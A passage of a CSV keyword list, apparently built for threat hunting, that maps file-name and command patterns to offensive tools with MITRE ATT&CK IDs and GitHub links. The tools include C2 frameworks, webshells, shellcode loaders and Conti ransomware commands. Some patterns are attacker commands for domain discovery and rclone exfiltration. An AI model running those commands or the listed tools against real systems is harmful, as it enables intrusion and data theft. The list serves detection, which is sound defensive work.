.Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpView.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpView.exe*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*SharpView\SharpView*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*SharpView-master*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*sharpweb all*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpWebManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpWebServer.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpWifiGrabber.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpwmi action=*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpWMI.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpWMI.Program*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpWmiManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*sharpwmi-N*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*sharpwsus locate*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - 
T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,0,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*SharpWSUS*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,0,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*SharpWSUS.*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,1,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*SharPyShell*,offensive_tool_keyword,SharPyShell,SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.,T1505 - T1027 - T1059 - T1117,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*sharpyshell.aspx*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*SharPyShell.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z 
-*SharpZeroLogon*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SharpZeroLogon.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpZippo.exe*,offensive_tool_keyword,cobaltstrike,List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpZippo,1,1,N/A,10,10,55,10,2022-05-24T15:57:33Z,2022-05-24T15:52:31Z -*ShawnDEvans/smbmap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - 
T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ShawnDEvans/smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*shell 'cmd.exe /c*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*shell net group *Domain Computers* /domain*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell net localgroup administrators*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell nltest /dclist*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell rclone.exe copy *,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell should now be running as nt authority\\system!*,offensive_tool_keyword,echoac-poc,poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/kite03/echoac-poc,1,0,N/A,8,2,118,25,2023-08-03T04:09:38Z,2023-06-28T00:52:22Z -*shell whoami /user*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - 
TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*shell whoami*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*shell.exe -s payload.txt*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/jas502n/bypassAV-1,1,0,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*shell_shocked*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*shell_shocked*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*shell_startup_files_modification.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*Shell3er.ps1*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,1,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*shellc *.bin *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*shellc *.shellc *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*ShellCmd cmd.exe *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*ShellCmd copy *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*ShellCmd net *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*ShellCmd sc qc *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*SHELLCODE GENERATOR*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 
- TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*shellcode inject *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Shellcode Injected Successfully*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*shellcode spawn *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*shellcode*shellcode.bin*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*shellcode.asm*,offensive_tool_keyword,POC,CVE-2022-21882 win32k LPE bypass CVE-2021-1732,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/KaLendsi/CVE-2022-21882,1,0,N/A,N/A,5,454,142,2022-01-27T04:18:18Z,2022-01-27T03:44:10Z -*Shellcode.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*shellcode_dll.dll*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*shellcode_dll\*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,0,N/A,N/A,,N/A,,, -*shellcode_dotnet2js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. 
JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*shellcode_dropper.c*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z -*shellcode_dynwrapx*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a 